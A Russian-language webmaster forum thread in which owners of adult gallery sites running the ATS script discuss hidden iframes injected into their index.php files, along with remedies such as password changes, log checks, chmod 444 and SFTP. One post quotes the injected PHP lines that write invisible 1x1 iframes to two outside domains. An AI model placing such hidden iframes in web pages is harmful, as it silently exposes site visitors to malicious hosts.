Новая тема   Ответить

 Mad Knight
Скрипт ATS 1.8 ротатор Thumbnail Manager Live 1.3

Открываю щас морду своего сиджа, а там заместо сиджа надпись
Parse error: syntax error, unexpected '<' in /home/adults/public_html/index.php on line 9.

Посмотрел файл index
Код:

стер я эти два чюдесных инфрейма
теперь голову ломаю что это за херня такая была

 net666
Еще аз зайди посмотри, может тебе это еще кудато прописали и через некоторое время опять восстановится.

 Woland
Ломанули видать, только ифрейм неграмотно написали, лишний < поставили ... Пни админов, пусть смотрят логи, хотя я не помню - если ats генерит индекс сам - хуй они уже чё там найдут, скорее всего, если логи не за неделю хранятся, конечно ...

 Mad Knight
Woland: Скорее всего не дописали просто /iframe>
Но тем не менее именно из за этой < качерги они спалились

 L.Estel
Посмотри владельца index.php. Сам ATS не меняеят. Если владелец не httpd, то твой FTP ассоunt известен еще кому-то. Меняй пароли и чисти комп от вирусов, а вообще юзай SSH и SCP

 Dimka
ААА... Помогите, поймал ету фигню с ифреймоми (код появляется во всех index файлах). Менял пароли, проверял на вирусы (Пандой и Spybot - Search & Destroy)... Но нет, появляется каждое утро на всех FTP. Что делать не знаю, подскажите кто в курсе

 Bulldog
возможно там в скриптах есть код, который все это дерьмо обновляет, попробуй вычистить все скрипты и установить заново.

 Woland
Цитата:

Пинать админов - пусть смотрят логи, что (кто) пишет в файлы и откуда (с сервака или из вне). Если с сервака - удалять, если извне - менять пароли, ограничивать доступ по IP, убирать нахуй ftp протокол с сервера, яростно чистить свой комп и т.д.

 L.Estel
На индекс файл поставить права 444

 Woland
Цитата: если я правильно помню - у ats индекс генерится скриптом и 444 будут не в тему

 L.Estel
Woland писал:

Неправльно помниш, ATS не генерит индекс.

 von Stoltz
L.Estel писал:

И никогда не генерил, создавал при установке и больше не трогал. Но в последней версии index.php идет в дистрибутиве, и о взломе 1.8 я пока не слышал, да и 1.7.2 достаточно надежен.
Так что это либо через фтп залезли, либо с соседнего аккаунта, если хост шареный, 444 в этом случае помогут. Еще можно на templates/*.tpl поставить 444, для спокойного сна. Но если по фтп лезут - не спасет, естественно.

 Woland
Оффтопик: Ну ладно, ладно ... Я тут пытаюсь какеров на ложный след навести - и от те на, нарисовались, правдолюбы ...

Если серьёзно - ну да, запамятовал, с кем не бывает

 Dimka
Спасибо за ваши ответы... Вот ещё один вопрос, посоветуйте пожалуста менеджер чтоб безопасно загружать файлы на FTP. Все которые я использовал они сохраняют все логины и пароли, а есть разовые, безопасные заходы без сохранения паролей. очень плохо разбираюсь в этих делах, спасибо за понимание...

 Woland
Цитата:

WinSCP http://winscp.net/eng/download.php не запоминает пароли, если не нажать специально "save", много умеет, бесплатен.
Но лучше не использовать ftp вообще (не поднимать на серваке, это к админам), а юзать sftp скажем, с помощью того же клиента.

 DrProff
Короче я тебя Очень растрою!
У меня на одном серваке, очень похожая хрень появилась года полтора назад. Что ни делали, все пох. С периодичностью в 2-3 месяца эта хрень появляеться в коде. Как ее побороть ни я ни админы незнают. Что тока не делали поменяли железо и все напрасно,... это блин как герпесс, вроде все поличил а рано или позно всерано вылазит ))))
САМ ГЕРПЕСОМ НЕ СТРАДАЮ, написал для сравнения.

Чаще всего в топах протона.
Спасение тока в чмодах 444 на все шаблоны и страницы,...

кста вот мой код, может кто что и мне посоветует

<iframe src=\"http://niklejo.net/?click=DDBD90\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://internetcountercheck.com/?click=16010546\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>

 Woland
Цитата:

Очень драматичная история, как админы на сервере или ты у себя на компе закладку найти не можешь полтора года - только зачем его то расстраивать ?

 Dimka
Всем спасибо, пока все ОК (тфу-тфу-тфу). Надеюсь так и будет.

 Mad Knight
А мне вот интересно домены зон (cn) неприкасаемые?
В этой доменной зоне что разрешено распространять вирусы?

 Woland
Mad Knight: Это китай Там ничего нельзя, но всё можно
Абузы могут читать только на китайском, например

 Mad Knight
Woland: Как с порно бороться дак это они первые, а как вирусы убирать так извините мы китайцы и по английски не бум бум.
Сволочи они, а не китайцы

 Woland
Цитата: Оффтопик: А что тебя удивляет - в порно всё понятно без слов, в этом одна из причин его популярности